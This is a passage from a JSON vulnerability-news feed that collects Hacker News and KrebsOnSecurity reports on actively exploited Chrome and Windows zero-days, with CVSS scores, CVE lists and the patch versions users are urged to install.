"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-30T09:11:00", "type": "thn", "title": "Unpatched Unauthorized File Read Vulnerability Affects Microsoft Windows OS", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24084", "CVE-2021-34484", "CVE-2021-41379"], "modified": "2021-12-03T03:42:06", "id": "THN:BABD510622DAA320F3F1F55EEDD7549A", "href": "https://thehackernews.com/2021/11/unpatched-unauthorized-file-read.html", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2022-05-09T12:39:28", "description": "[![Google Chrome Update](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhpjCuGD4WXaNN6nxKO5EalNHXrEO1r2PgkwQYS5Z4fg1J1iNhNuSZu4tqOM6Ohl9vpp6QyHLYCS9rWACrVbbaIJUPQ9rTXrZPXmPG7SMzGybYouS2Gy54kBSr90hQqQD0npkDgUM7qiCLvQEpG86SHqny5-bN6yTHLRxPBtls52iaOhN5Ui-sM9RZ4/s728-e1000/chrome-extensions.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhpjCuGD4WXaNN6nxKO5EalNHXrEO1r2PgkwQYS5Z4fg1J1iNhNuSZu4tqOM6Ohl9vpp6QyHLYCS9rWACrVbbaIJUPQ9rTXrZPXmPG7SMzGybYouS2Gy54kBSr90hQqQD0npkDgUM7qiCLvQEpG86SHqny5-bN6yTHLRxPBtls52iaOhN5Ui-sM9RZ4/s728-e100/chrome-extensions.jpg>)\n\nGoogle on Thursday shipped emergency patches to address two security issues in its Chrome web browser, one of which it says is being actively exploited in the wild.\n\nTracked as [CVE-2022-1364](<https://chromereleases.googleblog.com/2022/04/stable-channel-update-for-desktop_14.html>), the tech giant described the high-severity bug as a case of type confusion in the V8 JavaScript engine. Cl\u00e9ment Lecigne of Google's Threat Analysis Group has been credited with reporting the flaw on April 13, 2022.\n\nAs is typically the case with actively exploited zero-day flaws, the company acknowledged it's \"aware that an exploit for CVE-2022-1364 exists in the wild.\" Additional details about the flaw and the identity of the threat actors have been withheld to prevent further abuse.\n\nWith the latest fix, Google has patched a total of three zero-day vulnerabilities in Chrome since the start of the year. It's also the second type confusion-related bug in V8 to be squashed in less than a month -\n\n * [CVE-2022-0609](<https://thehackernews.com/2022/02/new-chrome-0-day-bug-under-active.html>) \\- Use-after-free in Animation\n * [CVE-2022-1096](<https://thehackernews.com/2022/03/google-issues-urgent-chrome-update-to.html>) \\- Type confusion in V8\n\n[![](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh6B83ZXigpC9fguwiLwmsTF6j73zc5NEtpSNiGfAAl-clSHcXVa31RbaQfOCfKesHRCqidahWfYEq_lTb6Wo-qPTz15of2-8gP75by67zdsyHfHawMXYaPWSZQLF1KIVi7jyn0uf4bWxBN0j73AHcGrmJOkXRdboYNb6jCKG2veHy3dPK8riejHmuo/s728-e100/chrome-update.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh6B83ZXigpC9fguwiLwmsTF6j73zc5NEtpSNiGfAAl-clSHcXVa31RbaQfOCfKesHRCqidahWfYEq_lTb6Wo-qPTz15of2-8gP75by67zdsyHfHawMXYaPWSZQLF1KIVi7jyn0uf4bWxBN0j73AHcGrmJOkXRdboYNb6jCKG2veHy3dPK8riejHmuo/s728-e100/chrome-update.jpg>)\n\nUsers are recommended to update to version 100.0.4896.127 for Windows, macOS, and Linux to thwart potential threats. Users of Chromium-based browsers such as Microsoft Edge, Brave, Opera, and Vivaldi are also advised to apply the fixes as and when they become available.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-04-15T03:25:00", "type": "thn", "title": "Google Releases Urgent Chrome Update to Patch Actively Exploited Zero-Day Flaw", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0609", "CVE-2022-1096", "CVE-2022-1364"], "modified": "2022-04-18T03:04:38", "id": "THN:E48AEFF468AB8445D91A32B6F5D7A770", "href": "https://thehackernews.com/2022/04/google-releases-urgent-chrome-update-to.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-15T06:13:26", "description": "[![Microsoft Patch Tuesdays](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhJcMd3_5v9AfJeccyNG75bWutsql3ZWUQopaddjFIniiwaHARP25cBu8hBIZVDJUIqPwdaIHPb7rSEvso0ThjD0TRU4MY2SHxjiVunEhFrlGstBY93fIcrVAr2SyU3lrCvFnaVvNPPA3mJM1cncQcVYJnaDqM2KEb4WvCFQ7qcZ9G10xetXKZcG63C/s728-e365/ms.png>)\n\nMicrosoft on Tuesday released [security updates](<https://msrc.microsoft.com/update-guide/releaseNote/2023-Feb>) to address 75 flaws spanning its product portfolio, three of which have come under active exploitation in the wild.\n\nThe updates are in addition to 22 flaws the Windows maker [patched](<https://learn.microsoft.com/en-us/deployedge/microsoft-edge-relnotes-security>) in its Chromium-based Edge browser over the past month.\n\nOf the 75 vulnerabilities, nine are rated Critical and 66 are rated Important in severity. 37 out of 75 bugs are classified as remote code execution (RCE) flaws. The three zero-days of note that have been exploited are as follows -\n\n * [**CVE-2023-21715**](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2023-21715>) (CVSS score: 7.3) - Microsoft Office Security Feature Bypass Vulnerability\n * [**CVE-2023-21823**](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2023-21823>) (CVSS score: 7.8) - Windows Graphics Component Elevation of Privilege Vulnerability\n * [**CVE-2023-23376**](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2023-23376>) (CVSS score: 7.8) - Windows Common Log File System (CLFS) Driver Elevation of Privilege Vulnerability\n\n\"The attack itself is carried out locally by a user with authentication to the targeted system,\" Microsoft said in advisory for CVE-2023-21715.\n\n\"An authenticated attacker could exploit the vulnerability by convincing a victim, through social engineering, to download and open a specially crafted file from a website which could lead to a local attack on the victim computer.\"\n\nSuccessful exploitation of the above flaws could enable an adversary to bypass Office macro policies used to block untrusted or malicious files or gain SYSTEM privileges.\n\nCVE-2023-23376 is also the third actively exploited zero-day flaw in the CLFS component after [CVE-2022-24521](<https://thehackernews.com/2022/04/microsoft-issues-patches-for-2-windows.html>) and [CVE-2022-37969](<https://thehackernews.com/2022/09/microsofts-latest-security-update-fixes.html>) (CVSS scores: 7.8), which were addressed by Microsoft in April and September 2022.\n\n\"The Windows Common Log File System Driver is a component of the Windows operating system that manages and maintains a high-performance, transaction-based log file system,\" Immersive Labs' Nikolas Cemerikic said.\n\n\"It is an essential component of the Windows operating system, and any vulnerabilities in this driver could have significant implications for the security and reliability of the system.\"\n\nIt's worth noting that Microsoft OneNote for Android is vulnerable to CVE-2023-21823, and with the note-taking service increasingly emerging as a [conduit for delivering malware](<https://thehackernews.com/2023/02/post-macro-world-sees-rise-in-microsoft.html>), it's crucial that users apply the fixes.\n\nAlso addressed by Microsoft are multiple RCE defects in Exchange Server, ODBC Driver, PostScript Printer Driver, and SQL Server as well as denial-of-service (DoS) issues impacting Windows iSCSI Service and Windows Secure Channel.\n\nThree of the Exchange Server flaws are classified by the company as \"Exploitation More Likely,\" although successful exploitation requires the attacker to be already authenticated.\n\nExchange servers have [proven](<https://thehackernews.com/2023/01/microsoft-urges-customers-to-secure-on.html>) to be [high-value targets](<https://www.tenable.com/blog/proxynotshell-owassrf-tabshell-patch-your-microsoft-exchange-servers-now>) in recent years as they can enable unauthorized access to sensitive information, or facilitate Business Email Compromise (BEC) attacks.\n\n## Software Patches from Other Vendors\n\nBesides Microsoft, security updates have also been released by other vendors over the past few weeks to rectify several vulnerabilities, including \u2014\n\n * [Adobe](<https://helpx.adobe.com/security/security-bulletin.html>)\n * [AMD](<https://www.amd.com/en/corporate/product-security>)\n * [Android](<https://source.android.com/docs/security/bulletin/2023-02-01>)\n * [Apple](<https://thehackernews.com/2023/02/patch-now-apples-ios-ipados-macos-and.html>)\n * [Atlassian](<https://thehackernews.com/2023/02/atlassians-jira-software-found.html>)\n * [Cisco](<https://tools.cisco.com/security/center/publicationListing.x>)\n * [Citrix](<https://support.citrix.com/search/#/All%20Products?ct=Software%20Updates,Security%20Bulletins&searchText=&sortBy=Modified%20date&pageIndex=1>)\n * [CODESYS](<https://www.codesys.com/security/security-reports.html>)\n * [Dell](<https://www.dell.com/support/security/>)\n * [Drupal](<https://www.drupal.org/security>)\n * [F5](<https://my.f5.com/manage/s/article/K000130496>)\n * [GitLab](<https://about.gitlab.com/releases/2023/02/14/critical-security-release-gitlab-15-8-2-released/>)\n * [Google Chrome](<https://chromereleases.googleblog.com/>)\n * [HP](<https://support.hp.com/us-en/security-bulletins>)\n * [IBM](<https://www.ibm.com/support/pages/bulletin/>)\n * [Intel](<https://www.intel.com/content/www/us/en/security-center/default.html>)\n * [Juniper Networks](<https://supportportal.juniper.net/s/global-search/%40uri?language=en_US#sort=date%20descending&f:ctype=\\[Security%20Advisories\\]>)\n * [Lenovo](<https://support.lenovo.com/us/en/product_security/ps500001-lenovo-product-security-advisories>)\n * Linux distributions [Debian](<https://www.debian.org/security/2022/>), [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21::::RP::>), [Red Hat](<https://access.redhat.com/security/security-updates/#/security-advisories?q=&p=1&sort=portal_publication_date%20desc&rows=10&portal_advisory_type=Security%20Advisory&documentKind=PortalProduct>), [SUSE](<https://www.suse.com/support/update/>), and [Ubuntu](<https://ubuntu.com/security/notices>)\n * [MediaTek](<https://corp.mediatek.com/product-security-bulletin/February-2023>)\n * [Mozilla Firefox, Firefox ESR, and Thunderbird](<https://www.mozilla.org/en-US/security/advisories/>)\n * [NETGEAR](<https://www.netgear.com/about/security/>)\n * [NVIDIA](<https://www.nvidia.com/en-us/security/>)\n * [Palo Alto Networks](<https://security.paloaltonetworks.com/>)\n * [Qualcomm](<https://docs.qualcomm.com/product/publicresources/securitybulletin/february-2023-bulletin.html>)\n * [Samba](<https://www.samba.org/samba/history/>)\n * [Samsung](<https://security.samsungmobile.com/securityUpdate.smsb>)\n * [SAP](<https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10>)\n * [Schneider Electric](<https://www.se.com/ww/en/work/support/cybersecurity/security-notifications.jsp>)\n * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>)\n * [Sophos](<https://www.sophos.com/en-us/security-advisories>)\n * [Synology](<https://www.synology.com/en-in/security/advisory>)\n * [Trend Micro](<https://success.trendmicro.com/dcx/s/vulnerability-response?language=en_US>)\n * [VMware](<https://www.vmware.com/security/advisories.html>)\n * [Zoho](<https://pitstop.manageengine.com/portal/en/community/filter/announcement>), and\n * [Zyxel](<https://www.zyxel.com/global/en/support/security-advisories>)\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-02-15T04:21:00", "type": "thn", "title": "Update Now: Microsoft Releases Patches for 3 Actively Exploited Windows Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24521", "CVE-2022-37969", "CVE-2023-21715", "CVE-2023-21823", "CVE-2023-23376"], "modified": "2023-02-15T04:21:13", "id": "THN:2FAF5419051DEBA89A6A8764081CBE01", "href": "https://thehackernews.com/2023/02/update-now-microsoft-releases-patches.html", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-05T16:25:13", "description": "[![Google Chrome Browser](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjPIpWOjahlvRij54ICh2NyDdEkKI9koTk4lx8UXqPG1hBOVokLO1jZE7QvnnAHX4fw21sdwK34cVKndChvGxTI0QScuSjwYGvpLSpuK9FSFbuXtXzoaxwm6I78OZwM-uyBKf7_r18ShybiBxFrmBcIKJ7pAD2BPSMaEVwJzpBkK1kNSbrrtJ6AmkPk/s728-e1000/chrome-update.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjPIpWOjahlvRij54ICh2NyDdEkKI9koTk4lx8UXqPG1hBOVokLO1jZE7QvnnAHX4fw21sdwK34cVKndChvGxTI0QScuSjwYGvpLSpuK9FSFbuXtXzoaxwm6I78OZwM-uyBKf7_r18ShybiBxFrmBcIKJ7pAD2BPSMaEVwJzpBkK1kNSbrrtJ6AmkPk/s728-e100/chrome-update.jpg>)\n\nGoogle on Monday shipped security updates to address a high-severity zero-day vulnerability in its Chrome web browser that it said is being exploited in the wild.\n\nThe shortcoming, tracked as [**CVE-2022-2294**](<https://chromereleases.googleblog.com/2022/07/stable-channel-update-for-desktop.html>), relates to a heap overflow flaw in the [WebRTC](<https://en.wikipedia.org/wiki/WebRTC>) component that provides real-time audio and video communication capabilities in browsers without the need to install plugins or download native apps.\n\nHeap buffer overflows, also referred to as heap overrun or heap smashing, occur when data is overwritten in the [heap area of the memory](<https://en.wikipedia.org/wiki/Memory_management#Manual_memory_management>), leading to arbitrary code execution or a denial-of-service (DoS) condition.\n\n\"Heap-based overflows can be used to overwrite function pointers that may be living in memory, pointing it to the attacker's code,\" MITRE [explains](<https://cwe.mitre.org/data/definitions/122.html>). \"When the consequence is arbitrary code execution, this can often be used to subvert any other security service.\"\n\nCredited with reporting the flaw on July 1, 2022, is Jan Vojtesek from the Avast Threat Intelligence team. It's worth pointing out that the bug also [impacts](<https://chromereleases.googleblog.com/2022/07/chrome-for-android-update.html>) the Android version of Chrome.\n\nAs is usually the case with zero-day exploitation, details pertaining to the flaw as well as other specifics related to the campaign have been withheld to prevent further abuse in the wild and until a significant chunk of users are updated with a fix.\n\nCVE-2022-2294 also marks the resolution of the fourth zero-day vulnerability in Chrome since the start of the year -\n\n * [**CVE-2022-0609**](<https://thehackernews.com/2022/02/new-chrome-0-day-bug-under-active.html>) \\- Use-after-free in Animation\n * [**CVE-2022-1096**](<https://thehackernews.com/2022/03/google-issues-urgent-chrome-update-to.html>) \\- Type confusion in V8\n * [**CVE-2022-1364**](<https://thehackernews.com/2022/04/google-releases-urgent-chrome-update-to.html>) \\- Type confusion in V8\n\nUsers are recommended to update to version 103.0.5060.114 for Windows, macOS, and Linux and 103.0.5060.71 for Android to mitigate potential threats. Users of Chromium-based browsers such as Microsoft Edge, Brave, Opera, and Vivaldi are also advised to apply the fixes as and when they become available.\n\nThe disclosure shortly follows a report from Google Project Zero, which [noted](<https://googleprojectzero.blogspot.com/2022/06/2022-0-day-in-wild-exploitationso-far.html>) that a total of 18 security vulnerabilities have been exploited as unpatched zero-days in the wild so far this year.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-05T02:55:00", "type": "thn", "title": "Update Google Chrome Browser to Patch New Zero-Day Exploit Detected in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0609", "CVE-2022-1096", "CVE-2022-1364", "CVE-2022-2294"], "modified": "2022-07-05T13:54:52", "id": "THN:2E90A09BA23747C57B4B5C9ED7D13ED9", "href": "https://thehackernews.com/2022/07/update-google-chrome-browser-to-patch.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-17T15:25:34", "description": "[![Google Chrome Zero-Day Vulnerability](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj3_bb3VbAiNI0HLVud2PvXV4VExBpknt5lLSc3IAtymjftt7sn5yG-gY7yWqZ7D13YpvQEhW_EH4K62wzm6dC_qDTQQokydIY0LHI2Ivvv6v5ShPJk8fOOoh0yQrASsDwCREknRK5SCrggAETbG4yY7w0t3uG53Dnpf3ckvBXKygsIpNHrnmHDrimR/s728-e1000/chrome.png)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj3_bb3VbAiNI0HLVud2PvXV4VExBpknt5lLSc3IAtymjftt7sn5yG-gY7yWqZ7D13YpvQEhW_EH4K62wzm6dC_qDTQQokydIY0LHI2Ivvv6v5ShPJk8fOOoh0yQrASsDwCREknRK5SCrggAETbG4yY7w0t3uG53Dnpf3ckvBXKygsIpNHrnmHDrimR/s728-e100/chrome.png>)\n\nGoogle on Tuesday rolled out patches for Chrome browser for desktops to contain an actively exploited high-severity zero-day flaw in the wild.\n\nTracked as **CVE-2022-2856**, the issue has been described as a case of insufficient validation of untrusted input in [Intents](<https://www.chromium.org/developers/web-intents-in-chrome/>). Security researchers Ashley Shen and Christian Resell of Google Threat Analysis Group have been credited with reporting the flaw on July 19, 2022.\n\nAs is typically the case, the tech giant has refrained from sharing additional specifics about the shortcoming until a majority of the users are updated. \"Google is aware that an exploit for CVE-2022-2856 exists in the wild,\" it [acknowledged](<https://chromereleases.googleblog.com/2022/08/stable-channel-update-for-desktop_16.html>) in a terse statement.\n\nThe latest update further addresses 10 other security flaws, most of which relate to use-after-free bugs in various components such as FedCM, SwiftShader, ANGLE, and Blink, among others. Also fixed is a heap buffer overflow vulnerability in Downloads.\n\nThe development marks the fifth zero-day vulnerability in Chrome that Google has resolved since the start of the year -\n\n * [**CVE-2022-0609**](<https://thehackernews.com/2022/02/new-chrome-0-day-bug-under-active.html>) \\- Use-after-free in Animation\n * [**CVE-2022-1096**](<https://thehackernews.com/2022/03/google-issues-urgent-chrome-update-to.html>) \\- Type confusion in V8\n * [**CVE-2022-1364**](<https://thehackernews.com/2022/04/google-releases-urgent-chrome-update-to.html>) \\- Type confusion in V8\n * [**CVE-2022-2294**](<https://thehackernews.com/2022/07/update-google-chrome-browser-to-patch.html>) \\- Heap buffer overflow in WebRTC\n\nUsers are recommended to update to version 104.0.5112.101 for macOS and Linux and 104.0.5112.102/101 for Windows to mitigate potential threats. Users of Chromium-based browsers such as Microsoft Edge, Brave, Opera, and Vivaldi are also advised to apply the fixes as and when they become available.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-17T12:02:00", "type": "thn", "title": "New Google Chrome Zero-Day Vulnerability Being Exploited in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0609", "CVE-2022-1096", "CVE-2022-1364", "CVE-2022-2294", "CVE-2022-2856"], "modified": "2022-08-17T13:41:27", "id": "THN:EDC4E93542AFAF751E67BF527C826DA4", "href": "https://thehackernews.com/2022/08/new-google-chrome-zero-day.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-09-06T06:03:15", "description": "[![Chrome Update](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgU5EpzvY9cLJdxPDYZpGhcMcZv4NWQKy-E_SphleQYJBz0-RK17I0vcuTEA4Y7j4FLYJZoocDlfvBAGQ9PLUcM-tSqm41GrfaPqhrzTyHbGiRLa0OW_IOvDb-6EfqX7V_LIzm1t5P_xj2by6ZVqAFz5d_bJ42p_faEgP_-St1X8fjuiAh0iW2Ak_Om/s728-e1000/chrome-update.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgU5EpzvY9cLJdxPDYZpGhcMcZv4NWQKy-E_SphleQYJBz0-RK17I0vcuTEA4Y7j4FLYJZoocDlfvBAGQ9PLUcM-tSqm41GrfaPqhrzTyHbGiRLa0OW_IOvDb-6EfqX7V_LIzm1t5P_xj2by6ZVqAFz5d_bJ42p_faEgP_-St1X8fjuiAh0iW2Ak_Om/s728-e100/chrome-update.jpg>)\n\nGoogle on Friday shipped emergency fixes to address a security vulnerability in the Chrome web browser that it said is being actively exploited in the wild.\n\nThe issue, assigned the identifier **CVE-2022-3075**, concerns a case of insufficient data validation in [Mojo](<https://chromium.googlesource.com/chromium/src/+/HEAD/mojo/README.md>), which refers to a collection of runtime libraries that provide a platform-agnostic mechanism for inter-process communication (IPC).\n\nAn anonymous researcher has been credited with reporting the high-severity flaw on August 30, 2022.\n\n\"Google is aware of reports that an exploit for CVE-2022-3075 exists in the wild,\" the internet giant [said](<https://chromereleases.googleblog.com/2022/09/stable-channel-update-for-desktop.html>), without delving into additional specifics about the nature of the attacks to prevent additional threat actors from taking advantage of the flaw.\n\nThe latest update makes it the sixth zero-day vulnerability in Chrome that Google has resolved since the start of the year -\n\n * [CVE-2022-0609](<https://thehackernews.com/2022/02/new-chrome-0-day-bug-under-active.html>) \\- Use-after-free in Animation\n * [CVE-2022-1096](<https://thehackernews.com/2022/03/google-issues-urgent-chrome-update-to.html>) \\- Type confusion in V8\n * [CVE-2022-1364](<https://thehackernews.com/2022/04/google-releases-urgent-chrome-update-to.html>) \\- Type confusion in V8\n * [CVE-2022-2294](<https://thehackernews.com/2022/07/update-google-chrome-browser-to-patch.html>) \\- Heap buffer overflow in WebRTC\n * [CVE-2022-2856](<https://thehackernews.com/2022/08/new-google-chrome-zero-day.html>) \\- Insufficient validation of untrusted input in Intents\n\nUsers are recommended to upgrade to version 105.0.5195.102 for Windows, macOS, and Linux to mitigate potential threats. Users of Chromium-based browsers such as Microsoft Edge, Brave, Opera, and Vivaldi are also advised to apply the fixes as and when they become available.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-09-03T03:56:00", "type": "thn", "title": "Google Releases Urgent Chrome Update to Patch New Zero-Day Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0609", "CVE-2022-1096", "CVE-2022-1364", "CVE-2022-2294", "CVE-2022-2856", "CVE-2022-3075"], "modified": "2022-09-06T04:20:05", "id": "THN:0ADE883013E260B4548F6E16D65487D3", "href": "https://thehackernews.com/2022/09/google-release-urgent-chrome-update-to.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "krebs": [{"lastseen": "2022-04-19T21:33:35", "description": "![](https://krebsonsecurity.com/wp-content/uploads/2021/07/windupate.png)\n\n**Microsoft** on Tuesday released updates to fix roughly 120 security vulnerabilities in its **Windows** operating systems and other software. Two of the flaws have been publicly detailed prior to this week, and one is already seeing active exploitation, according to a report from the **U.S. National Security Agency** (NSA).\n\nOf particular concern this month is [CVE-2022-24521](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-24521>), which is a "privilege escalation" vulnerability in the Windows common log file system driver. In its advisory, Microsoft said it received a report from the NSA that the flaw is under active attack.\n\n\u201cIt\u2019s not stated how widely the exploit is being used in the wild, but it\u2019s likely still targeted at this point and not broadly available," assessed **Dustin Childs** with Trend Micro's Zero Day Initiative. "Go patch your systems before that situation changes.\u201d\n\nNine of the updates pushed this week address problems Microsoft considers "critical," meaning the flaws they fix could be abused by malware or malcontents to seize total, remote access to a Windows system without any help from the user.\n\nAmong the scariest critical bugs is [CVE-2022-26809,](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26809>) a potentially "wormable" weakness in a core Windows component (**RPC**) that earned a CVSS score of 9.8 (10 being the worst). Microsoft said it believes exploitation of this flaw is more likely than not.\n\nOther potentially wormable threats this month include 